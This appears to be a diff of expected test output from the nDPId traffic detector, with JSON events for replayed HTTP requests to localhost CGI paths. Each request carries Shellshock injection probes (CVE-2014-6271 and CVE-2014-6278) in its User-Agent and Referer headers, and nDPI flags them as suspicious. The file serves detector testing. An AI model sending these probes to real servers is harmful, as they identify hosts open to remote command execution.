+01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277402,"pkt":"AAAAAAAAAAAAAAAACABFAAENn\/9AAEAGm+l\/AAABfwAAAcUiH5Cfgqc8sQq4SIAYAED\/AQAAAQEICp1m\/cKdZv3CR0VUIC9kb3dubG9hZC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277403,"pkt":"AAAAAAAAAAAAAAAACABFAAESp5VAAEAGlE5\/AAABfwAAAcUkH5At0J9VXKwRhYAYAED\/BgAAAQEICp1m\/cOdZv3DR0VUIC9lbnRyb3B5c2VhcmNoLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277405,"pkt":"AAAAAAAAAAAAAAAACABFAAEI2lVAAEAGYZh\/AAABfwAAAcUmH5ARUOKViVHVaYAYAED+\/AAAAQEICp1m\/cSdZv3ER0VUIC9lbnYuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"thread_ts_msec":1576420277406,"pkt":"AAAAAAAAAAAAAAAACABFAAEQ2p9AAEAGYUZ\/AAABfwAAAcUoH5D43eJbIwWC0IAYAED\/BAAAAQEICp1m\/cadZv3GR0VUIC9lbnZpcm9ubWVudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277407,"pkt":"AAAAAAAAAAAAAAAACABFAAENbStAAEAGzr1\/AAABfwAAAcUqH5C5flXvg270eYAYAED\/AQAAAQEICp1m\/cedZv3HR0VUIC9lem1sbS1icm93c2UgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277409,"pkt":"AAAAAAAAAAAAAAAACABFAAENkcFAAEAGqid\/AAABfwAAAcUsH5BKNKl4Ee+JJYAYAED\/AQAAAQEICp1m\/cmdZv3JR0VUIC9mb3JtbWFpbC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277410,"pkt":"AAAAAAAAAAAAAAAACABFAAEToPJAAEAGmvB\/AAABfwAAAcUuH5CLPJg5VfIqUIAYAED\/BwAAAQEICp1m\/cqdZv3KR0VUIC9Gb3JtTWFpbC1jbG9uZS5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
